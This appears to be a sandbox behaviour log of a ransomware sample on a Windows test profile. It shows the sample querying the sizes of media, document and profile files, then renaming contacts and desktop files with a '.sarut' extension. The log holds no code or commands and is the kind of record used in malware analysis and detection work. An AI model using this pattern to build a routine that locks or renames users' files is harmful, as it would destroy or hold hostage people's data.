Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\-avjGaTi5fer-bMia.mp3	type = size, size_out = 34296	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\8GQt402SpMYiSB.mp3	type = size, size_out = 69326	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\9Tpbrmx9-eI2m3we6r.mp3	type = size, size_out = 38122	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\ArZI.wav	type = size, size_out = 24107	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\EfZdtNhwP.wav	type = size, size_out = 78523	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Hgc-ATkiW0nvYtLeb_2n.wav	type = size, size_out = 26077	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\HLn_CQ4.wav	type = size, size_out = 25622	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\iYZ-gLKtWydBalI Lxxb.wav	type = size, size_out = 84977	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\j pK_84.mp3	type = size, size_out = 47244	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\NBJbBMpw.wav	type = size, size_out = 34564	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\P8IAG.m4a	type = size, size_out = 21675	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\RAzu8DVMv-r45eOe8.mp3	type = size, size_out = 2708	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\svbuVRxjZk-A.mp3	type = size, size_out = 20318	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\xGq9s.wav	type = size, size_out = 65887	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\YEmk 2o.m4a	type = size, size_out = 17847	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z29_EgFwKYFm3nLlZNM.wav	type = size, size_out = 39067	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4mbF.gif	type = size, size_out = 17172	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\pCb9pgcYyZh0BJvZP_h.gif	type = size, size_out = 9055	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-cTwhDb_kz0NM.mkv	type = size, size_out = 3155	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\-odfzMtVfgsa IL.swf	type = size, size_out = 91252	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\1wkpap.mkv	type = size, size_out = 92156	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\4wuSJ8EnkH3MW.swf	type = size, size_out = 58997	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8caLHfAk0PaW.avi	type = size, size_out = 21486	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\8rejvdNsx1W.flv	type = size, size_out = 101866	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\90ZHyHwir.mp4	type = size, size_out = 57540	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AklgegIwErKzeM3EnB.mkv	type = size, size_out = 26362	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\AKzil.avi	type = size, size_out = 55752	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\aY2-M1hNNjjWY.flv	type = size, size_out = 77327	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\BqAvk1V3qDn9l.swf	type = size, size_out = 50112	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\bZE6e7_.mkv	type = size, size_out = 50424	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\DJt2bijl-Kw7JEUBg.mkv	type = size, size_out = 54909	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\hAf_3U-gHvce4wcnQA_w.mkv	type = size, size_out = 86542	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\HlD5zrxsdUc1Y3OP7nh.mp4	type = size, size_out = 46703	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\isz2C.swf	type = size, size_out = 80033	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\J6vHB4Uh4HDmN.swf	type = size, size_out = 38321	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\KEVeaf.avi	type = size, size_out = 32625	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\kUiTedID_arfjfDWv.swf	type = size, size_out = 66105	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\LA0fDt.flv	type = size, size_out = 1639	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\nzD16NoQ.flv	type = size, size_out = 92907	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ODTwo4qOOJx.avi	type = size, size_out = 29362	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\PNAkUcrgBy4hgy2ZfZzW.flv	type = size, size_out = 36068	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\Qm7ufohlk1udTd4Kn5.mkv	type = size, size_out = 95856	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qswPmOaFTerp.flv	type = size, size_out = 62013	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\qVm94.swf	type = size, size_out = 27778	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\QWssd9nb3vYvw99.flv	type = size, size_out = 55336	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\RLWhOE4xU0nYY34j.mkv	type = size, size_out = 100810	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\SY7CEy_advQ-GPuP.swf	type = size, size_out = 37403	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\sz7_xapMC.avi	type = size, size_out = 7482	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\UCiGSIuisINE78_i.mp4	type = size, size_out = 89915	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\UOIbo9FKzWl25DD93Yi9.mp4	type = size, size_out = 14297	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\X4T9oiLBOsZNDrM.mp4	type = size, size_out = 95973	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\YcDckA2w- DNgH7cL.flv	type = size, size_out = 4657	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\21IMcPko8Du_3IsFB-Q.gif	type = size, size_out = 76874	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\kqfuGsV.m4a	type = size, size_out = 73175	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lpSHh6l1qJtVRTN-Ti0s.swf	type = size, size_out = 63135	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\Pla8UWh-7PWmaOK2.mp3	type = size, size_out = 66014	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\qBg34ZfuK.pptx	type = size, size_out = 89819	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\upDp4KTN.bmp	type = size, size_out = 36165	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\OBWh_DIngrZmxYk.mp3	type = size, size_out = 62940	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\p uXvDzcIfFbqot.odp	type = size, size_out = 54543	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\Pt He.jpg	type = size, size_out = 93597	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\5ZcHC6YUYXtvBMsNr4\ug1Kmdfe1kMSfX_H.m4a	type = size, size_out = 83084	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\8D Vnyq.pps	type = size, size_out = 4988	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\BykHThXT56fcYaqQV2X.doc	type = size, size_out = 100787	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\dv6T5k65sGE5bg7xPK.pps	type = size, size_out = 97653	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\GoUIrAAbbfuwwj-FRw.ods	type = size, size_out = 75868	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\hk7Xm32Lt1utxRomo79.pptx	type = size, size_out = 96042	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\KvTi3ZX.docx	type = size, size_out = 40984	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\lA9UBwHgz3W.docx	type = size, size_out = 72920	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\nnz1zWbbzOZyy0IcqsRw.ots	type = size, size_out = 57938	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\S-tHiiR.pdf	type = size, size_out = 102236	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\spMPG 9xkkM.odp	type = size, size_out = 94643	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\Tgy4aDx5L5gYbgCK1.doc	type = size, size_out = 66914	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\UTVyOlBsO.pptx	type = size, size_out = 76621	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\WEpp.ppt	type = size, size_out = 18241	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mbmFXME9ZArqIFJjiii\x29MLGrvh.pptx	type = size, size_out = 73372	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss	type = size, size_out = 0	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	type = size, size_out = 271360	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	type = size, size_out = 236	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	type = size, size_out = 226	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	type = size, size_out = 134	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\0sb N ZRL9SdkEk.m4a	type = size, size_out = 92258	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\1rcxkwS-WVFCcNTFOvBu.mp3	type = size, size_out = 62922	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\4qxq GBI03hb94VB1Bxh.mp3	type = size, size_out = 27291	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\5Ek2Ncsbu3-Kn69J_.wav	type = size, size_out = 43142	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\8goXTx lf4qln.mp3	type = size, size_out = 90370	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\9UqmwCjaFzvC9hxQ_Hzm.mp3	type = size, size_out = 19549	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\aqCrbf.mp3	type = size, size_out = 53411	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\BH6aDwcoogn.mp3	type = size, size_out = 7318	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\E5BUqHk2HLgOe.m4a	type = size, size_out = 71589	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\iD-nB 21AVlDXuyQt.wav	type = size, size_out = 98217	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\jqJvbR_QvwlZ.mp3	type = size, size_out = 9479	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\L9aKE_qa0wpEDQP.mp3	type = size, size_out = 19512	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\ML2ljwZwYxgt.m4a	type = size, size_out = 71126	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\oaN8Ym.m4a	type = size, size_out = 47783	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\P r09cK6te2.mp3	type = size, size_out = 47250	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\T4bMO1.wav	type = size, size_out = 91922	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\twx8so6utmD0rym.mp3	type = size, size_out = 100534	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\7SLVf8\yYv0O.m4a	type = size, size_out = 6302	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\DWu1l-Y.png	type = size, size_out = 54678	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\jTQEcsS48yYmNAYPg-C.png	type = size, size_out = 3090	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\oi_ITTR8-wThmdlbwB.png	type = size, size_out = 70336	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Oy-L7Z_7HHJqNjbRbhn.png	type = size, size_out = 72438	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Tkrayns.jpg	type = size, size_out = 72512	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\Wq-pSl9brlP45GOmX.jpg	type = size, size_out = 25837	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\XOHwMSl dhcUZR2jE3dY.bmp	type = size, size_out = 98368	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\YzSNWGeNkq7FltH72B.bmp	type = size, size_out = 27907	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\5l6On7s_t7GucX53.bmp	type = size, size_out = 69806	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\60yrjxUg Vj9.bmp	type = size, size_out = 3048	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\gwGJ_.png	type = size, size_out = 10858	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\HAIVHenLu6VmrRA9qdSL.png	type = size, size_out = 82995	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\HsIk z MzQTD.gif	type = size, size_out = 17748	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\Qwgdm9P2yFX8.bmp	type = size, size_out = 90522	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\ROFZyVd380HDxuGO Th.jpg	type = size, size_out = 93558	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\wg6gkYjub7md9I.jpg	type = size, size_out = 69384	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\zZtwi8cLkIz2TYu9.gif	type = size, size_out = 59882	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\95A_eDslLCP1_cxOmp.png	type = size, size_out = 82314	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\a4C0Db hej9s3eMTL.m4a	type = size, size_out = 15155	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\AeGLUfnT 5mkX0jwT7I.avi	type = size, size_out = 93045	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\blPbdb.png	type = size, size_out = 32423	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\FuG6Li hHaoR.wav	type = size, size_out = 46902	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\OaWM3OsWAcMsAPmjtMp.doc	type = size, size_out = 38943	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\sySoZPGd3WyY2p8FSZlL.csv	type = size, size_out = 45564	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\V8Vbr5d9qBcwJea.mp4	type = size, size_out = 8803	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0_DXftOx\lTnvEEeQtMe\zNCu.odp	type = size, size_out = 81791	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico	type = size, size_out = 29926	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\8yd_-EOXVhtdOvzi yYD.bmp	type = size, size_out = 57917	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\jiyYQcsk0aKO.bmp	type = size, size_out = 44723	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\U LJ9GkFn_ZZk5OYhw-.jpg	type = size, size_out = 2892	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\VOisP_2QkSl3ZoB7yjo.gif	type = size, size_out = 84907	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\WaWTw-qe_8kdov2ReXE.bmp	type = size, size_out = 38625	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\AuC6dJL9xmafY\wso4Uc9Jo_0.png	type = size, size_out = 57342	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\3LXSiPCs.bmp	type = size, size_out = 23820	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\arfQt1VvAj.bmp	type = size, size_out = 52851	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\mdD0aXVF0dK25EdF.bmp	type = size, size_out = 30647	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\NI9HSi svXDo.jpg	type = size, size_out = 35960	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\Wa jATnjlZIHpQ.bmp	type = size, size_out = 37464	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\0 hjFn64gP.jpg	type = size, size_out = 1856	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\5SOK8nzJPtO5w6tJww.png	type = size, size_out = 25283	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\dSMvKtmHiWH 1Bu.gif	type = size, size_out = 97698	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\eLYk8XmS1.gif	type = size, size_out = 67702	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\pXiB_A.png	type = size, size_out = 25893	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\y5xwn1F.jpg	type = size, size_out = 93277	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\YJEie6a3AkLk83C8Lu.png	type = size, size_out = 97577	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kQOrnOQ\bpyHeQcsI\zk2UII3QYbHa4.jpg	type = size, size_out = 35836	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\q5KdcF5euAdAWzc8\fQmlW2dWeShgkpqPW.png	type = size, size_out = 82655	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\io8_8GuAwtxmu\GbnfrHoOCWV\q5KdcF5euAdAWzc8\HEQ_cwY6PJg1oZNA5e.png	type = size, size_out = 11228	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip	type = size, size_out = 42495	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat	type = size, size_out = 32768	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab	type = size, size_out = 581730	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi	type = size, size_out = 185344	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties	type = size, size_out = 719	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab	type = size, size_out = 25340970	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi	type = size, size_out = 906752	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml	type = size, size_out = 13	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml	type = size, size_out = 13	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml	type = size, size_out = 836	1	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2l ht.rtf.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2l ht.rtf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\496tLHemB5Lzkb7xCb7M.mkv.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\496tLHemB5Lzkb7xCb7M.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bljvKKc.mp3.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bljvKKc.mp3	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bWkYr4TM2TfL3vpMnJ.doc.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\bWkYr4TM2TfL3vpMnJ.doc	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c6jIP57RiiMG8.ods.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c6jIP57RiiMG8.ods	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CFtrxYI4ehxro.doc.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CFtrxYI4ehxro.doc	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CVd8AGKl82socUEV.png.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\CVd8AGKl82socUEV.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe.sarut	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\E0A7.tmp.exe	1	Fn
